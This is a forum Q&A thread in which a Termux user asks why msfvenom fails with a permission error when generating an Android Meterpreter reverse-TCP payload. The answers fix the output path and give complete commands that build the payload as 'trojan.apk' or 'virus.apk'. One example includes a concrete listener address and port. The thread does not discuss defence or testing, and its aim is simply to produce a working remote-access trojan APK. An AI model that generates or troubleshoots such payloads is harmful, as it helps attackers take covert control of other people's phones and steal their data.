# when i try to make payload it is showing me

Tags: android, payload, metasploit, termux

When I make a payload with this command in my termux app

```
. /msfvenom -p android/meterpreter/reverse_tcp lhost=IP ADDRESS lport=3333 -o /sdcard/FILE NAME/test.apk
```

Then it is showing me

```
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 9435 bytes
Error: Permission denied @ rb_sysopen - /sdcard/apk_payload/hack.apk
```

How to solve it please please  please help me

Answer (score 0, accepted):

First of all, sorry for my bad english.

It looks like your problem is the path, the *sdcard* path is *~/storage*
And inside, you just can access some folders, in my case are *dcim, downloads, movies, music, pictures & shared*

I've decided to put it in *downloads*, so the path should look like this:
*~/storage/downloads/trojan.apk*

The final code should be like this:
*./msfvenom -p android/meterpreter/reverse_tcp LHOST=*Your Ip* LPORT=*Your Port* -o ~/storage/downloads/trojan.apk*

Comment: Please add some explanation. It worked won't explain much.

Answer (score 0):

First if msfvenom is in your usr/local/bin folder you should not need ./msfvenom just start with msfvenom.

Second the -o option is used when the -x option is used otherwise you should not use it.

Your command should look like this

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=your port R > /root/what-ever-path-you-want/app-name.apk
```

Example:

```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=4444 R > /root/Documents/virus.apk
```